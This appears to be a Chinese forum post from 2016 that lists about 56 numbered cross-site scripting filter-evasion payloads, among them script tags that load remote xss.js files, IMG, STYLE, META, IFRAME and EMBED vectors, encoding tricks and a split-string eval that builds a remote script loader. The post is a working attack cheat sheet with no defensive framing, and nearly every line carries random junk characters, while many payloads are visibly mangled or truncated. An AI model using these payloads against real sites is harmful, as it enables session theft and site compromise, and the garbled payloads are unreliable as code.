(1)普通的XSS JavaScript注入, p/ ]9 D9 ^0 j
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. }, a7 n& T {2 X# o. H) j(99)另类弹框
1 v& ?. J% Z% C$ Y/ c3 a<q/oncut=alert()>1; @! o2 R& n9 E, k
<s/onclick=alert()>b
0 H! `7 f7 l- t3 {7 _. t <XSS=" onclick="alert(1)//">clickme</SSX=">9 o* v6 T. o% @! r# d6 g9 }
<zzz onclick=alert`1`>clickme</zzz> _9 l" m5 m5 V* x. h- o
<a onclick=alert`1`>clickme</a>5 X' ?' X* z# A
<a=">clickme</a=">& C* }0 z- w- B) f. G% b9 f2 P6 p
<a=">clickme</a>. K' l0 L6 ~$ H: n0 c5 }0 |
<z=">clickme</z=">8 I* b j' F4 u7 B9 C" z
<z onclick=alert`1`>clickme</z>) r# e8 A, y. A+ L$ M
$ M! m' C" N9 @* V(2)IMG标签XSS使用JavaScript命令; f( A- T* B! f' U/ ^0 c- w
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: d+ P3 c; Z- |9 u' g
* Y* p, ~7 @9 f" ]2 a# o
(3)IMG标签无分号无引号
! Y' R5 y8 v3 E. f<IMG SRC=javascript:alert(‘XSS’)>8 F4 Q0 c# K. z3 \8 M1 l/ G
, a* u" h9 G& R( ]% @
(4)IMG标签大小写不敏感. G( G" J# ]; Z: _3 {
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 m3 r! v3 p& X u% b. G$ Y) p4 H% v# N; l% l
(5)HTML编码(必须有分号)/ ~8 b* m1 }; c: r
<IMG SRC=javascript:alert(“XSS”)># d( D/ {9 i5 j. a7 z* Z8 D
# x+ K) @4 I8 i& y# M3 P
(6)修正缺陷IMG标签0 k n$ C. _$ g+ U$ r
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. m8 a: v# H7 {1 e
7 D- m2 E8 E2 C: ?: }" r- ^ I
(7)formCharCode标签(计算器)' v% Q" P/ Q, A8 n
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>& L. k( S+ m8 M: i" F
% `! T- p7 m& p2 q: }1 M4 H7 O+ B
(8)UTF-8的Unicode编码(计算器)
: L! w! F4 B& f" X! s, s4 u! J6 A<IMG SRC=jav..省略..S')>" L4 z# Q, B8 f$ e9 T3 S
+ o9 q" R- J, |$ g8 {1 n(9)7位的UTF-8的Unicode编码是没有分号的(计算器)# N0 R# V8 E# N( H- w; r
<IMG SRC=jav..省略..S')>9 g/ U3 l5 Q5 [1 D# ~( m
) o+ P5 t: H9 L% l(10)十六进制编码也是没有分号(计算器)) S. C/ b2 m/ l: l
<IMG SRC=\'#\'" /span>
- j) }! R0 ^2 M: k/ W1 t. x+ T; \- ]% s
. J" z5 p) ]& L* @(11)嵌入式标签,将Javascript分开9 r! h4 f& O/ ?" X# j9 n; |: S. e
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>0 e' q' l6 T/ z* g8 S' f# k
6 p5 `5 Y; U4 u- A
(12)嵌入式编码标签,将Javascript分开7 s# u. t1 }9 t7 \* e0 J
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
! w5 D% P1 c0 V# w4 N3 H
9 n5 Z; u& _! U8 O3 c(13)嵌入式换行符% a: r5 E# b8 \& Y
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
& L$ q1 [4 b1 \; a5 O8 w
% G( x1 I' y, \( s(14)嵌入式回车
5 m- E4 S5 W* K/ @. a<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>7 ]8 [4 B- \/ `$ f
( j) a. b1 e u# q8 O/ S/ U' T(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 v8 ~! K4 L+ w/ {3 _<IMG SRC=\'#\'" /span>8 o) Y7 Q1 z5 h5 J: N- u+ W
/ b8 G7 H5 `1 y8 t) s# f(16)解决限制字符(要求同页面)
# [0 y* g1 I) o; y<script>z=’document.’</script>2 K0 Z# K0 D: g0 R3 T! n B0 x
<script>z=z+’write(“‘</script>
5 ?0 V- f2 s/ e<script>z=z+’<script’</script>
8 a. i) P: E$ {% ?7 G<script>z=z+’ src=ht’</script>* _8 ^' t* e0 `- Y |
<script>z=z+’tp://ww’</script>$ x: g) J# p @, N0 t1 q
<script>z=z+’w.shell’</script>5 R/ m7 V/ M0 a: V
<script>z=z+’.net/1.’</script>
& T6 e3 D: S! [# `- ]<script>z=z+’js></sc’</script>$ E, c, S0 h4 U( q
<script>z=z+’ript>”)’</script>6 w2 m7 O4 w; |
<script>eval_r(z)</script>
8 M4 l9 ]- D$ [
2 w6 o7 ]' {+ n; K$ p6 S3 [' C [(17)空字符
: p" h( L% d4 Qperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
+ `3 K* [( x! w7 E2 {
' o/ e/ D% T Y) u$ `* I(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) i! a0 k; X; `, ]& @$ ~
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out2 u3 V$ a) ]; ?0 k! b! s
" m6 d, w% J$ U. @" F6 E(19)Spaces和meta前的IMG标签0 y% D5 k" L" H
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”> t4 B1 b$ d# q& z$ q! K
: L9 |) z6 n$ |; y, S" J$ s1 h( T
(20)Non-alpha-non-digit XSS' x3 q; ~& x: v% N
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>6 V |4 p0 R; E9 ~6 O
, j4 m5 |2 h0 I" [5 G/ J8 ~' a(21)Non-alpha-non-digit XSS to 25 ?# n* A& w# u1 {- l8 F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 S% `) H& `3 H7 j/ {! i# m
: a. V9 f+ L% q9 l0 ]5 N
(22)Non-alpha-non-digit XSS to 3
! y% h6 C6 `( z- a8 k, ^<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
/ ]5 t# |, h( [; B. Y* W$ m; N/ B7 L! k" |# |- u J2 G. }
(23)双开括号$ \; y" Q/ S8 b- W
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 S) T* X" y% `5 o
1 X/ M6 |- V" ]3 q; W0 C(24)无结束脚本标记(仅火狐等浏览器)
' n, x0 G. t% c8 |3 f/ ^<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ n5 h: y+ @5 I4 K7 s% G9 {) w" S
1 u/ k( V9 {' S. L4 q Z(25)无结束脚本标记2
4 |' V* ?8 v& C( D4 J<SCRIPT SRC=//3w.org/XSS/xss.js>
2 Y9 j# W7 _" v, ~# r6 }4 ?, z) W, G7 X7 n
(26)半开的HTML/JavaScript XSS- U# f$ j8 `7 q! E
<IMG SRC=\'#\'" /span>) s. I- h# C z3 U4 \5 J6 T
/ v7 w4 V6 o9 o- ^" W' N(27)双开角括号
. H9 i- ~6 e* v! }; C6 S# ]9 x: k<iframe src=http://3w.org/XSS.html <: h- h9 b! E, F3 ^% g9 ?
- o: F0 _0 D7 B8 @3 U B1 V4 Q' Y
(28)无单引号 双引号 分号
( \. i" p: Z- F# p5 k( J<SCRIPT>a=/XSS/4 ]4 K1 h; O4 G
alert(a.source)</SCRIPT>
7 k0 n4 X3 Q7 M8 A7 z9 G( @
0 u# D; Z5 y7 G! j! U# D8 _3 s(29)换码过滤的JavaScript0 g$ d4 M9 B8 i$ A% [* F
\”;alert(‘XSS’);//; A8 N& ?; G0 w# U" D1 r9 Y
. U4 j* z* h0 i T8 o
(30)结束Title标签$ E% | Y. k( r) X, C
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 s4 t; `3 N0 h* X! O$ ]
* y0 d3 H; h# N6 ?) A) o! @3 l0 d(31)Input Image' W5 L6 T" `8 e- V* E
<INPUT SRC=\'#\'" /span>, W* y* l5 F" e. B
9 ]3 p! K" s4 ^ |. x: C! @! K(32)BODY Image
; S0 W" v2 e, k) E# |2 t0 ?5 j<BODY BACKGROUND=”javascript:alert(‘XSS’)”>3 n g+ U" R. f/ t0 n
' ?. k: Z- p! }- a3 d3 Q+ U$ d(33)BODY标签
: V o% d/ }' \; C r O: |6 e t<BODY(‘XSS’)>5 Q( p) }, i V' ]
! s* a% C6 T/ b3 w(34)IMG Dynsrc
/ `+ t" H: J! Q) A# }; U3 x5 \<IMG DYNSRC=\'#\'" /span>
9 X d0 Z( i" k7 [: r3 b: @+ D- K6 V2 i+ c6 N! F# S
(35)IMG Lowsrc+ F4 x- j+ v- ^- A; u
<IMG LOWSRC=\'#\'" /span>
3 [/ W* R( P& v/ b- q5 @+ B0 E, }( b
(36)BGSOUND" b' i/ }& |- v" X" T" y Z
<BGSOUND SRC=\'#\'" /span>
" ?0 q6 ?. ]! z- w/ m& M. [2 y( N
+ J# B8 ?; B1 B- N* X(37)STYLE sheet
0 n! ?6 ?" F$ q<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
! e, i( b) m5 u. S8 G) M9 n5 t, }; [4 z6 e7 i$ J5 z" `1 ^
(38)远程样式表
1 W, r) j& n4 D<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
& Z! c+ x* l2 Q# K. L5 c
~. u/ o, Z# d$ X3 d6 r! r(39)List-style-image(列表式)" P2 L6 f7 r5 F5 C8 m5 a2 v
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
3 _. T' C! L& N2 o) D2 w# D1 U. [6 m% Y }) l$ X
(40)IMG VBscript, k/ l& r* P4 M- Z/ [% [
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
" i/ ?$ Y/ I! `6 A1 a( M1 ^( Q
) D" G# }, E$ B9 g9 v(41)META链接url
9 F- l" [' S2 F<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
5 p# q- C# t5 |2 v. V, }1 l% H8 T6 c( }% x" X& E; \9 E3 ]+ ]
(42)Iframe X' j7 K! K6 A) D3 C. f
<IFRAME SRC=\'#\'" /IFRAME>
E* B& |' R, | V) T3 }6 ^3 {# ~6 r/ W: C8 c1 a: N# p
(43)Frame
: r" C- ^: \' O2 \( U<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
K/ p. x4 }3 w* Y- ~& h. T9 L [
: z; p4 E; O; D+ e0 H, z(44)Table/ B/ V2 ~5 [ h K+ y8 C+ |
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) ]+ l# L' M' p" e* Y' _$ y" b" R
& p& U, w$ Z+ ], G
(45)TD- Y% K! E- k9 ~/ H* j* c0 c6 d- ^
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. G: p/ T6 J/ m( x
- N/ P& c1 A% t) b' |% [(46)DIV background-image. o' I! Q' y7 L) E4 }6 f% ~ ~
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, c- B% E$ P" Z9 h' w8 A
) M; I+ a0 d# B* A& x(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
9 f8 x; b8 I/ z# M9 O3 g2 Y4 I* f<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>/ w3 g& V$ z8 Y0 z% y
( y& I1 [" m; l) C, y
(48)DIV expression; b, r6 H; Q6 E0 {) ^# a0 V9 x* H
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ {9 y, H- U; n! |! ~* @& @) G, t( q
(49)STYLE属性分拆表达, q! `- X- |8 I9 i# L% Y% ]4 a
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
& w) j9 Y2 D; |$ [/ j
3 h z% z$ R5 A(50)匿名STYLE(组成:开角号和一个字母开头)
% y2 d& Y7 _4 M5 C3 q! a- |. g<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- D* @: \4 U% i; k2 s4 ]5 f
7 x, H' R; N$ y2 U- M(51)STYLE background-image
) S1 K9 R% s2 x6 J7 h<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>2 x9 p9 M) H! v' M9 _, |( R1 Z
& X+ o3 E2 n4 z
(52)IMG STYLE方式
0 N* E. x' a- P+ t; I& h7 o' Kexppression(alert(“XSS”))’>5 v# `' ?9 t, U# }' u# H1 S
- ?" j+ n# f' F. E1 E- A( y(53)STYLE background
* [6 d: Z: I- Q- y# O, v: P<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 D" E }2 R; j# g# @7 ?
q9 q7 M/ Y5 q(54)BASE1 n6 C, s' F* R* ?* |* X
<BASE HREF=”javascript:alert(‘XSS’);//”>& g1 Q6 d @7 F
) s$ J9 q7 N( r
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS7 T' l# M3 d* ?& w5 Q
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
( l4 O3 B8 c- I9 q3 F |
发表于 2016-4-28 10:06:15
收藏
支持
反对